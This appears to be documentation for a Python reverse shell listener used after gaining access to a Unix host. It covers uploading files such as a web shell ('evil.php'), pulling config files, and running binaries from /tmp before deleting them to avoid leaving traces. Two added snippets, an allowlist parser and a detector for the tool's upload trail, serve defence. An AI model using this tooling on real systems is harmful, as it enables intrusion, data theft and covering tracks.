The reverse shell client is a Python based alternative for a netcat reverse shell listener (nc -lvp <port>).
The default reverse shell client (rsh-client.py) ships with many features, such as uploading, downloading, executing and editing files on the (Unix based) remote host you managed to get a shell on.
You can also download the standalone version (rsh-client-standalone.py), which is simply a smaller version without the custom commands. It is mostly useful for local privilege escalation, when you want to get a shell as another process and netcat is not available on the system.
Using the reverse shell client is simple: execute the script from the command line without any parameters. This makes your shell listen on every interface address on your system, on a randomly selected port, for an inbound connection.
Viewing the help section
You can view the help page by executing the script with the --help argument:
python rsh-client.py --help
Listen on a specific port
You can specify what port to listen on with the --port <int> or -p <int> argument. This is useful if you're behind a firewall and have a specific port forwarded to you. It is recommended that you always use this argument, to prevent errors when trying to create a reverse shell.
python rsh-client.py --port 1337
Listen on a specific interface address
You can specify what interface address to listen on by executing the script with the --interface <string> or -i <string> argument. This can be used to limit inbound connections to a specific interface, such as 127.0.0.1. By default the script listens on any interface address.
python rsh-client.py --interface 127.0.0.1
Setting an inbound connection whitelist
You can specify a whitelist of addresses to accept connections from with the -A <string> or --accept <string> argument. This limits who can connect to the script, which matters because it only supports one connection at a time; support for multiple connections might be added in the future.
python rsh-client.py --accept "127.0.0.1,192.168.0.21"
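An added example, not the project's own code, of how the --accept allowlist from this section can be enforced before a connection is handed to the shell. It goes beyond the page by also accepting CIDR ranges, and it fails closed on malformed entries. The names parse_accept_list, is_allowed and should_accept are assumptions.

```python
import ipaddress


def parse_accept_list(spec):
    """Parse the comma-separated value given to --accept.

    Hypothetical helper (not the project's own code). Each entry must be a
    valid IPv4/IPv6 address or, going beyond the page, a CIDR network such as
    10.0.0.0/16. A malformed entry raises ValueError instead of being skipped,
    so a typo in the allowlist cannot silently widen who may connect.
    """
    nets = []
    for raw in spec.split(","):
        item = raw.strip()
        if not item:
            continue
        # strict=False lets "192.168.0.21/24" stand for its whole network;
        # a bare address becomes a /32 (or /128) network.
        nets.append(ipaddress.ip_network(item, strict=False))
    if not nets:
        raise ValueError("empty accept list")
    return nets


def is_allowed(peer_ip, accept_list):
    """True if the connecting address falls inside any allowlisted network."""
    addr = ipaddress.ip_address(peer_ip)
    # A mismatched address family (IPv6 peer vs IPv4 network) is simply False.
    return any(addr in net for net in accept_list)


def should_accept(peer_ip, accept_list):
    """Decision for one inbound connection.

    accept_list is None when --accept was not given (accept everyone, which
    is the script's default). Anything that is not a parseable address is
    rejected rather than letting an exception take the listener down.
    """
    if accept_list is None:
        return True
    try:
        return is_allowed(peer_ip, accept_list)
    except ValueError:
        return False


# Typical use right after sock.accept():
#   conn, (peer_ip, _) = sock.accept()
#   if not should_accept(peer_ip, allow): conn.close()
```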
Persistent mode
Persistent mode prevents you from losing your shell when pressing ^C (CTRL + C), which normally stops any Python script. It is enabled with the --persistent argument.
You can still exit your shell with the command rsh exit or by pressing ^Z (CTRL + Z). Using ^Z is not advised, however, as it might keep the connection alive or prevent Python from releasing the port you were listening on. If you have no other choice but to ^Z your script, use the following bash command to kill all processes listening on the port you just used for the reverse shell client:
kill -9 $(lsof -ti :<port>)
python rsh-client.py --persistent
Debug mode
Debug mode is an experimental option mainly used to test features during development, which is why it is not listed in the help section. It can be enabled with the --debug argument. It is not advised to use this option unless you're modifying the script, or your connection does not send any data back.
python rsh-client.py --debug
The RSH shell
The RSH shell is activated once the script receives an inbound connection. The command rsh ... is used to access special features such as uploading and downloading. However, if you wish to send the command itself to the remote host, prefix it with a backslash, like \rsh ..., to prevent it from being interpreted as a local method. The same applies to nano -> \nano and vim -> \vim, as these can cause your shell to freeze or disconnect. (The rsh command is used on some Linux distributions as a synonym for the
Exiting the shell
Exits the current shell by closing the socket. By default, rsh exit is executed when ^C (CTRL + C) is pressed. This behaviour can be disabled with the --persistent argument when running the script.
Uploading files to the remote host
Uploading a file to the remote host is done by reading the local file and echoing its contents in blocks of 1024 bytes into the remote file, like so: /bin/echo -en '\x08\x03\x00..' >> /remote/file. The script first checks whether the shell has permission to write to the specified location and offers to upload to /tmp/.. instead if permission is denied. If no remote file is specified, the file is echoed into the current working directory; if the file already exists, you will be prompted to overwrite the remote file.
rsh upload <localfile> [<remotefile>]
rsh upload /root/shell.php /home/www/evil.php
Downloading files from the remote host
Downloading a file from the remote host is done by checking whether the remote file is readable and then using the cat <remotefile> command to get its contents, which are then written into a file on your local system.
rsh download <remotefile> [<localfile>]
rsh download /home/www/config.php /tmp/config.php
Executing files or scripts
Executing files is done by automatically uploading the file to the /tmp/.. directory on the remote host, executing it and then removing it so it doesn't leave a trail. Any parameters are appended to the file execution. See rsh help upload and rsh help download for more information about file transfers.
rsh execute <localfile> [<params>]
rsh execute /root/somebinary -abc
Editing files on the remote host
Editors such as nano and vim tend to break your shell, so the rsh edit command downloads the file to your local machine, opens your default editor and then re-uploads the file to the remote host. The script first checks whether it has the rights to read and write the file. If the local file has not changed after editing, nothing is re-uploaded. You can use the --force parameter to force the script to re-upload the file.
rsh edit <remotefile> [-f | --force]
rsh edit /home/www/index.php -f
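An added example from the detection side, not part of the project: the upload, execute and edit features above all leave the same trace on the remote host, a run of /bin/echo -en '\x..' >> <file> appends (one per 1024-byte block), and execute adds a drop-run-delete sequence under /tmp. This hypothetical detector (detect_transfers is an assumed name) scans one shell's recorded command sequence, such as auditd EXECVE records, for exactly those shapes; the session data is constructed.

```python
import re

# Command shapes taken from the README's description of the transfer features:
#   upload:  /bin/echo -en '\x..\x..' >> <remote file>, repeated per 1024-byte block
#   execute: the file is dropped under /tmp, run, then removed
# Plain `cat <file>` (the download path) is not flagged: on its own it is
# indistinguishable from ordinary administration.
ECHO_HEX_APPEND = re.compile(r"/bin/echo\s+-en\s+'(?:\\x[0-9a-fA-F]{2})+'\s*>>\s*(\S+)")
TMP_EXEC = re.compile(r"^\s*(/tmp/\S+)(?:\s+\S+)*\s*$")
TMP_RM = re.compile(r"^\s*rm\s+(?:-\w+\s+)*(/tmp/\S+)")


def detect_transfers(commands):
    """Return (kind, path, block_count) findings for one shell's command sequence.

    Hypothetical detector, not part of the project. `commands` is the ordered
    list of command lines a single shell executed (auditd EXECVE records or a
    session log). Consecutive hex-echo appends to the same path collapse into
    one finding carrying the number of 1024-byte blocks written.
    """
    appends = {}      # remote path -> number of echo-append blocks seen
    executed = set()  # dropped /tmp files that were later run
    wiped = set()     # ...and then deleted again
    for cmd in commands:
        m = ECHO_HEX_APPEND.search(cmd)
        if m:
            appends[m.group(1)] = appends.get(m.group(1), 0) + 1
            continue
        m = TMP_EXEC.match(cmd)
        if m and m.group(1) in appends:
            executed.add(m.group(1))
            continue
        m = TMP_RM.match(cmd)
        if m and m.group(1) in executed:
            wiped.add(m.group(1))
    return [("execute-and-wipe" if path in wiped else "upload", path, n)
            for path, n in appends.items()]


# Constructed session, not a real capture: a 2-block upload and a drop-run-delete.
SAMPLE_SESSION = [
    "id",
    "ls -la /home/www",
    r"/bin/echo -en '\x48\x65\x6c\x6c\x6f' >> /home/www/evil.php",
    r"/bin/echo -en '\x20\x77\x6f\x72\x6c' >> /home/www/evil.php",
    r"/bin/echo -en '\x7f\x45\x4c\x46' >> /tmp/.sb123",
    "/tmp/.sb123 -abc",
    "rm -f /tmp/.sb123",
    "cat /etc/issue",
]

if __name__ == "__main__":
    for finding in detect_transfers(SAMPLE_SESSION):
        print(finding)
```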
Fingerprinting the remote host
The fingerprinting command is simply a useful utility to find out more about the system and find possible ways to escalate local privileges.
By downloading software from this website the person in question agrees that they will use any of the software in question in an ethical (non-malicious) way and agrees that the developer(s) are NOT held responsible for any damage caused by the use and/or abuse of this software.
Misuse of any software from this website may result in criminal charges brought against the person in question, depending on the country or state of residence, which can result in probation, fines up to $100000 or prison sentences up to 20 years in federal prison.
Please think twice before you run a script if you don't know what you're doing.